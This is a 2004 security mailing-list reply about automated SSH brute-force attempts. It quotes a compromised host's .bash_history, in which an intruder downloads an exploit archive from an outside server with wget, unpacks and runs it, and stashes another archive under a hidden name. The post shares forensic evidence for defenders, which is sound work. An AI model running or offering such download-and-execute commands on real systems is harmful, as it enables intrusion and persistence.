mailing list archives
Re: Re: Automated SSH login attempts?
From: andrewg () felinemenace org
Date: Fri, 30 Jul 2004 06:36:02 -0700
Accidentially sent only to Stefan, so redoing it.
On Thu, Jul 29, 2004 at 06:38:15PM +0200, Stefan Janecek wrote:
Hmmm - I have also been getting those login attemps, but thought them to
be harmless. Maybe they are not *that* harmless, though... Today I
managed to get my hands on a machine that was originating such login
attempts. I must admit I am far from being a linux security expert, but
this is what I've found out up to now:
I got a similar experience from a game box I look after
(void.labs.pulltheplug.com, but people may prefer
http://vortex.labs.pulltheplug.com, feel free to jump on the irc server @
irc.pulltheplug.com, #social or #vortex).
The .bash_history is as follows:
wget sh3ll.info/milenium/xpl.tgz;tar zxvf xpl.tgz;cd super;./prt
tar zxv xpl.tgz
tar zxvf xpl.tgz
ps -aux |grep test
mv psy1985.tgz .drivers
tar zxvf psy1985.tgz
rm -rf psy1985.tgz
inetd -e -o
It would appear that if they can't get a local root, they'll use the box for
Hopefully this helps someone. I haven't looked too much into this, if wanted
I could grab the source ip addresses used for logging into guest, but thats
probably not overly useful.
Full-Disclosure - We believe in it.
Re: Automated SSH login attempts? Dan Margolis (Jul 30)